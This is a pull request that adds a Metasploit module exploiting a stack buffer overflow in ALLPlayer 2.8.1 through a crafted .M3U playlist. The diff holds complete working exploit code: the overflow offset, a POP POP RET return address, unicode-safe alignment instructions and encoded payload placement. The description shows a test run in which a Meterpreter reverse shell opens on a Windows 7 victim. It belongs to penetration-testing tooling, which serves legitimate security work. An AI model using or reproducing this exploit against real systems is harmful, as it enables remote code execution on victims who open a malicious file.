### PR TITLE
Add module for OSVDB-98283

### DIFF
--- a/modules/exploits/windows/fileformat/allplayer_m3u_bof.rb
+++ b/modules/exploits/windows/fileformat/allplayer_m3u_bof.rb
@@ -1,0 +1,108 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::FILEFORMAT
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'ALLPlayer M3U Buffer Overflow',
+      'Description'    => %q{
+          This module exploits a stack-based buffer overflow vulnerability in
+        ALLPlayer 2.8.1, caused by a long string in a playlist entry.
+        By persuading the victim to open a specially-crafted .M3U file, a
+        remote attacker could execute arbitrary code on the system or cause
+        the application to crash. This module has been tested successfully on
+        Windows 7 SP1.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'metacom',      # Vulnerability discovery
+          'Mike Czumak',  # Original exploit
+          'Gabor Seljan'  # Metasploit module
+        ],
+      'References'     =>
+        [
+          [ 'BID', '62926' ],
+          [ 'BID', '63896' ],
+          [ 'EDB', '28855' ],
+          [ 'EDB', '29549' ],
+          [ 'EDB', '29798' ],
+          [ 'EDB', '32041' ],
+          [ 'OSVDB', '98283' ],
+          [ 'URL', 'http://www.allplayer.org/' ]
+        ],
+      'DefaultOptions' =>
+        {
+          'ExitFunction' => 'process'
+        },
+      'Platform'       => 'win',
+      'Payload'        =>
+        {
+          'DisableNops'    => true,
+          'BadChars'       => "\x00\x0a\x0d\x80\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f",
+          'Space'          => 3060,
+          'EncoderType'    => Msf::Encoder::Type::AlphanumUnicodeMixed,
+          'EncoderOptions' =>
+            {
+              'BufferRegister' => 'EAX'
+            }
+        },
+      'Targets'        =>
+        [
+          [ ' ALLPlayer 2.8.1 / Windows 7 SP1',
+            {
+              'Offset' => 301,
+              'Ret'    => "\x50\x45",  # POP POP RET from ALLPlayer.exe
+              'Nop'    => "\x6e"       # ADD BYTE PTR DS:[ESI],CH
+            }
+          ]
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => 'Oct 09 2013',
+      'DefaultTarget'  => 0))
+
+      register_options(
+        [
+          OptString.new('FILENAME', [ false, 'The file name.', 'msf.m3u'])
+        ],
+      self.class)
+
+  end
+
+
+  def exploit
+    nop = target['Nop']
+
+    sploit =  rand_text_alpha_upper(target['Offset'])
+    sploit << "\x61\x50"      # POPAD
+    sploit << target.ret
+    sploit << "\x53"          # PUSH EBX
+    sploit << nop
+    sploit << "\x58"          # POP EAX
+    sploit << nop
+    sploit << "\x05\x14\x11"  # ADD EAX,0x11001400
+    sploit << nop
+    sploit << "\x2d\x13\x11"  # SUB EAX,0x11001300
+    sploit << nop
+    sploit << "\x50"          # PUSH EAX
+    sploit << nop
+    sploit << "\xc3"          # RET
+    sploit << nop * 109
+    sploit << payload.encoded
+    sploit << rand_text_alpha_upper(10000) # Generate exception
+
+    # Create the file
+    print_status("Creating '#{datastore['FILENAME']}' file ...")
+    file_create("http://" + sploit)
+
+  end
+end
+


### PR DESCRIPTION
This is an MSF port of http://www.exploit-db.com/exploits/32041.

Tested successfully on Windows 7 SP1, see results below:

```
msf > use exploit/windows/fileformat/allplayer_m3u_bof
msf exploit(allplayer_m3u_bof) > run

[*] Creating 'msf.m3u' file ...
[+] msf.m3u stored at /home/gabor/.msf4/local/msf.m3u
msf exploit(allplayer_m3u_bof) > use exploit/multi/handler
msf exploit(handler) > run

[*] Started reverse handler on 192.168.171.128:4444
[*] Starting the payload handler...
[*] Sending stage (769024 bytes) to 192.168.171.131
[*] Meterpreter session 1 opened (192.168.171.128:4444 -> 192.168.171.131:49184) at 2014-03-04 00:43:20 +0100

meterpreter > sysinfo
Computer        : WIN-BCJL9PJ5BF5
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter >
```
